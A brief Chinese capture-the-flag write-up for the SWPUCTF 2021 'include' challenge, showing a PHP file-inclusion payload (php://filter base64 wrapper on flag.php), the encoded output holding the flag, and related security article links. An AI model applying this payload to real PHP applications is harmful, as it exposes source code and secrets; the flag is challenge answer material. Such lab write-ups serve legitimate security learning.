[SWPUCTF 2021 新生赛]include

传入一个file试试,尝试/?file=3

提示flag 在flag.php中,但是无法直接读出flag.php - 原因是由于flag.php中不具有echo相对应的输出语句,应该是仅具有$flag变量的定义。因此,采用php伪协议进行输出

?file=php://filter/convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSdOU1NDVEZ7Njk4MGY2OTctNzE0OC00M2FlLWFjZmUtNjk2OWZjMzdkNTgwfSc7

进行base64解密即可

相关推荐
Demons_kirit9 小时前
实验:文件路径遍历,简单情况(Lab: File path traversal, simple case)
网络安全
sbjdhjd11 小时前
SQL 注入零基础详解:原理、手工注入流程与 Sqli-Labs 靶场实战1~5关和第9关思路
数据库·sql·计算机网络·web安全·网络安全·网络攻击模型·安全架构
学习溢出12 小时前
【网络安全】Living off the Land 攻击 | 蓝队防守
安全·web安全·网络安全
学逆向的12 小时前
汇编——寻址方式
开发语言·汇编·网络安全
上海云盾-高防顾问1 天前
SD-WAN 跨境加速,真实日常使用体验
网络·网络安全
中北marry1 天前
玄机靶场wp 应急响应-webshell查杀
网络安全
爱网络爱Linux2 天前
HCIA-Security(1)网络安全常见的威胁
web安全·网络安全·hcia-security·hcia安全·华为网络安全·网络安全常见的威胁
我不是QI2 天前
一、主持人信息(域名 网站资产情报搜集)原理解析
安全·网络安全
lubiii_2 天前
网络安全法律法规备考速查手册
安全·web安全·网络安全
2501_916008892 天前
HTTPS 抓包遇到证书绑定怎么办,使用 TraceEagle 解除 App 证书校验
网络协议·计算机网络·http·网络安全·ios·adb·https